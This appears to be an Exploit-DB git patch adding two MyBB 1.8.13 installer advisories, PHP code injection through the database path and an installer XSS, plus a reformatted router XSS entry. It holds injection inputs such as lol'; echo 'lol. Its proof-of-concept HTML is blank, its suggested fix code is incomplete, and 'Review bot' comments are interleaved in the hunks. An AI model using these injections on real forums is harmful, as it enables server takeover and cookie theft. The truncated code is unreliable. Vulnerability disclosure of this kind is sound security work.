From 441b3bdbff95ddb38b70fe383099f83db26e9ce7 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 20 Nov 2017 05:02:09 +0000 Subject: [PATCH] DB: 2017-11-20 2 new exploits MyBB 1.8.13 - Remote Code Execution MyBB 1.8.13 - Cross-Site Scripting
---
 files.csv | 2 ++ platforms/hardware/webapps/43150.html | 24 ++++++++------ platforms/php/webapps/43136.txt | 32 ++++++++++++++++++ platforms/php/webapps/43137.txt | 47 +++++++++++++++++++++++++++ 4 files changed, 95 insertions(+), 10 deletions(-) create mode 100644 platforms/php/webapps/43136.txt create mode 100644 platforms/php/webapps/43137.txt
diff --git a/files.csv b/files.csv
index 3e2122291..488ec0cc9 100644
--- a/files.csv
+++ b/files.csv
@@ -38843,6 +38843,8 @@ id,file,description,date,author,platform,type,port
 43123,platforms/multiple/webapps/43123.txt,"Logitech Media Server 7.9.0 - 'Radio URL' Cross-Site Scripting",2017-11-03,"Dewank Pant",multiple,webapps,0
 43128,platforms/php/webapps/43128.txt,"pfSense 2.3.1_1 - Command Execution",2017-11-07,s4squatch,php,webapps,0
 43129,platforms/windows/webapps/43129.txt,"ManageEngine Applications Manager 13 - SQL Injection",2017-11-07,"Cody Sixteen",windows,webapps,9090
+43136,platforms/php/webapps/43136.txt,"MyBB 1.8.13 - Remote Code Execution",2017-11-11,Pabstersac,php,webapps,0
+43137,platforms/php/webapps/43137.txt,"MyBB 1.8.13 - Cross-Site Scripting",2017-11-11,Pabstersac,php,webapps,0
 43138,platforms/php/webapps/43138.rb,"Web Viewer 1.0.0.193 (Samsung SRN-1670D) - Unrestricted File Upload",2017-11-13,0xFFFFFF,php,webapps,0
 43140,platforms/php/webapps/43140.txt,"Kirby CMS < 2.5.7 - Cross-Site Scripting",2017-11-13,"Ishaq Mohammed",php,webapps,0
 43155,platforms/php/webapps/43155.txt,"Zeta Components Mail 1.8.1 - Remote Code Execution",2017-11-16,MalwareBenchmark,php,webapps,0
diff --git a/platforms/hardware/webapps/43150.html b/platforms/hardware/webapps/43150.html
index eaf909812..b42317154 100644
--- a/platforms/hardware/webapps/43150.html
+++ b/platforms/hardware/webapps/43150.html
@@ -6,19 +6,23 @@
 # CVE : CVE-2017-16843
+ NewKeyword Parameter:
-Login to the router
-Click advanced setup
-Click parental controls
-In the blocked keywords text box enter: test”> (screenshot 1)
-Click the add keyword button to receive the pop up.
+1. Login to the router
+2. Click advanced setup
+3. Click parental controls
+4. In the block these keywords text box enter: test”>
+5. Click the add keyword button to receive the pop up.
-Login to the router
-Click advanced setup
-Click parental controls
-In the block these websites text box enter: test”> (screenshot 1)
-Click the add domain button to receive the pop up.
+
+NewDomain Parameter:
+
+1. Login to the router
+2. Click advanced setup
+3. Click parental controls
+4. In the block these websites text box enter: test”>
+5. Click the add domain button to receive the pop up.
 Proof of concept code:
diff --git a/platforms/php/webapps/43136.txt b/platforms/php/webapps/43136.txt
new file mode 100644
index 000000000..cf42be340
--- /dev/null
+++ b/platforms/php/webapps/43136.txt
@@ -0,0 +1,32 @@
+# Exploit Title: RCE in MyBB up to 1.8.13 via installer
+# Date: Found on 05-29-2017
+# Exploit Author: Pablo Sacristan
+# Vendor Homepage: https://mybb.com/
+# Version: Version > 1.8.13 (Fixed in 1.8.13)
+# CVE : CVE-2017-16780
+
+This RCE can be executed via CSRF but doesn't require it (in some special cases). The requirements are there shouldn't be a lock in the /install/ directory and then if you have access to the install directory you don't need CSRF, but if you don't then you need CSRF. I have included a patch and a description. The exploit will write PHP code to /inc/config.php which is then 'REQUIRE'd in most of the pages in MyBB, the PoC will just write lollol to the top of every page in MyBB. I also have an XSS but that I will report later.
+
+There is a CSRF vulnerability in MyBB /install/index.php which can be used to inject PHP code into /inc/config.php which is then used in most of the pages (require MYBB_ROOT."/inc/config.php" is in most of the pages).
+
+The vulnerability exists in the table creation process for sqlite databases, this is because the Database Path is then inserted into the /inc/config.php file in line 11 as $config['database']['database'] = 'DB Path';
+
+The vulnerability occurs because MyBB doesn't properly escape the Database Path, allowing an attacker to easily inject PHP by inserting a DB Path of : lol'; echo 'lol this will not cause any parse errors since there will be a : '; added at the end. Of course the attacker can easily just execute code in the server, getting backdoor access to the server easily.
+
+A PoC would be to host a site like this:
+
+
+
+
+
+
+
+
+
+
+
+
+And when a victim logged in as admin to a MyBB website visits this site they will have a "lollol" at the top of every page (or you can also make it do much more malicious things).
+
+A simple patch would be to change /install/index.php:1410 to:
+if(strstr($config['dbname'], "./") !== false || strstr($config['dbname'], "../") !== false || strstr($config['dbname'], "'") !== false || empty($config['dbname']))
\ No newline at end of file
diff --git a/platforms/php/webapps/43137.txt b/platforms/php/webapps/43137.txt
new file mode 100644
index 000000000..871f1aa10
--- /dev/null
+++ b/platforms/php/webapps/43137.txt
@@ -0,0 +1,47 @@
+# Exploit Title: XSS in MyBB up to 1.8.13 via installer
+# Date: Found on 05-29-2017
+# Exploit Author: Pablo Sacristan
+# Vendor Homepage: https://mybb.com/
+# Version: Version > 1.8.13 (Fixed in 1.8.13)
+# CVE : CVE-2017-16781
+
+No HTML escaping when returning an $error in /install/index.php can
+lead to an XSS which can be used to take over an attacker account.
+
+The vulnerability occurs in /install/index.php:2503 and occurs because
+there is no html encoding of the $error. A simple way to exploit this
+is to create an error by using the Database Server Hostname and
+inserting HTML characters there.
+
+It is a POST XSS and this is a PoC:
+
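Review bot: The suggested patch in the hunk's last added line, `if(strstr($config['dbname'], "./") !== false || strstr($config['dbname'], "../") !== false || strstr($config['dbname'], "'") !== false || empty($config['dbname']))`, is a substring deny-list, while the text above it says the value is written into `/inc/config.php` as a single-quoted PHP string literal; the durable mitigation is to encode the value for that context when the file is generated, e.g. emit `var_export($config['dbname'], true)` in place of the hand-quoted `'DB Path'`, and to accept only an allow-listed character set for the SQLite path. The `"../"` test is redundant, since any string containing it already matches the `"./"` test. The header line `# Version: Version > 1.8.13 (Fixed in 1.8.13)` also disagrees with the title's "up to 1.8.13" about whether 1.8.13 itself is affected; one of the two should be corrected, and the same line appears in the 43137.txt hunk.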
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+Using this attack you can steal the cookies and you can install the MyBB server as you want, giving you almost full control over the MyBB server.
+
+A simple fix would be to change the function error_list($array) to:
+function error_list($array)
+{
+ $string = "\n";
+ return $string;
+}
\ No newline at end of file
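Review bot: The proposed replacement for `error_list($array)` at the end of the hunk never reads `$array` and returns only `"\n"`, so as printed it drops the errors rather than escaping them; the hunk header announces 47 added lines and fewer are visible, so the list-building lines (like the PoC markup earlier in the hunk) appear to have been lost in rendering rather than omitted by the author. Whatever those lines contain, the fix the advisory describes needs each item passed through `htmlspecialchars($error, ENT_QUOTES, 'UTF-8')` before it is concatenated, with a comment such as `// errors echo installer form input back to the page; encode for HTML context` next to that call. The phrase `take over an attacker account` reads as a slip for the victim's account, since the text goes on to describe control of the MyBB install rather than of the attacker.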